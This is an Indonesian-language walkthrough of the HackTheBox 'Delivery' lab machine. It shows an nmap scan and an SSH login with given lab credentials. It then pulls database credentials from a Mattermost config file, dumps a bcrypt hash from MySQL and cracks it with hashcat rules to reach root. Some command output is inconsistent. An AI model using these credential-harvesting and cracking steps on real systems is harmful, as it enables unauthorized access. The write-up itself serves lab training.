INTRO
HackThebox Delivery Adalah Box Dengan Tingkat Kesulitan Mudah ,Tingkat Mechine Matrix Lebih Mengarah Ke Custom Exploitation ,Application Yang Retan Dimesin Tersebut Adalah Mattermost ,Exploitation : MySQL: Useful Resources ,MySQL: Sorting Result ,MySQL: Select Query ,Dan Memacahkan Password Menggunakan HashCat: Rules Type Base64.
CTF
Alat-Alat Hacking:
NMAP SCAN
Open ports :
Copy 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2 Added Domain/IP dari mesin ke /etc/hosts :
Copy sudo nano /etc/hosts + 10.10.10.222 delivery.htb helpdesk.delivery.htb ENUMERATION
Copy ssh maildeliverer@10.10.10.222
Passwordd: Youve_G0t_Mail! Output:
maildeliverer@Delivery:~$
PRIVILAGE ESCALATION
Create Rule Wordlists
Copy echo -n "PleaseSubscribe!" > rule Find Mattermost Folder
Copy cd /tmp && find / -name "mattermost*" > save.txt
cat save.txt Output :
Copy /opt/mattermost/config
Copy cd /opt/mattermost/config
cat config.json Output:
Copy "DataSource":"mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s Hash Pass Root
Copy mysql -h localhost -u mmuser -pCrack_The_MM_Admin_PW O utput
Copy MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
Copy MariaDB [(none)]> use mattermost;
Database changed
Copy MariaDB [mattermost]> show tables; Output:
Copy +------------------------+
| Tables_in_mattermost |
+------------------------+
| Users |
+------------------------+
46 rows in set (0.001 sec)
Copy MariaDB [mattermost]> desc Users; Output:
Copy +--------------------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------------------+--------------+------+-----+---------+-------+
| Username | varchar(64) | YES | UNI | NULL | |
| Password | varchar(128) | YES | | NULL | |
+--------------------+--------------+------+-----+---------+-------+
25 rows in set (0.001 sec)
Copy MariaDB [mattermost]> select Username,Password from Users; Output:
Copy +--------------+--------------------------------------------------------------+
| Username | Password |
+----------------------------------+------------------------------------------+
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+----------------------------------+------------------------------------------+
19 rows in set (0.000 sec) Create File In Local Server :
Copy echo "$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO " > hashroot.txt HashCat Rule
Copy $ ls -la /usr/share/hashcat/rules O utput:
Copy -rw-r--r-- 1 root root 933 Jul 31 20:09 best64.rule
Copy hashcat -r /usr/share/hashcat/rules/best64.rule --stdout rule > wordlists.txt
wc -l wordlists.txt Output:
Copy 77 wordlists.txt
hashcat -m 3200 -a 0 hashroot.txt wordlists.txt Output:
Copy $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 Root
Copy su root && password : PleaseSubscribe!21 O utput
Copy maildeliverer@Delivery:~$ su root 
